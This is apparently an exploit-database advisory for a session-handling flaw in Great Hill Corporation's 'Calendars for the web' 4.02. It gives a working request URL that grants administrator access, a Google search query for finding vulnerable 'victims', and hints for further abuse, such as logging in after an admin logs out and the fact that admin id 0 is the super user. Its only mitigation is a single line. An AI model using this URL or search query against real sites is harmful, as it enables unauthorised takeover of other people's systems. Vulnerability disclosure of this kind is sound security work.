Vendor: Calendars for the web
By: SecVuln
CVSS: 3.3 (MEDIUM)
Session Management Vulnerability
CWE: 287
Product Name: Calendars for the web
Affected Version From: 04.02
Affected Version To: 04.02
Patch Exists: NO
Related CWE: N/A
CPE: a:great_hill_corporation:calendars_for_the_web
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Calendars for the web by great hill corporation
Calendars for the web has a vulnerability in the administration page. The page saves the previous session, so anyone navigating to the page gets admin access.

Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe

After attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

A Google query can find a couple of pages of victims: inurl:calweb/calweb.exe

Further hacks: if they disable the timeout, you can still log in right after they log out... You could probably do something with that. Also, the 0 at the end is the administrator (super user) id.
Mitigation:
Set a login timeout of five minutes.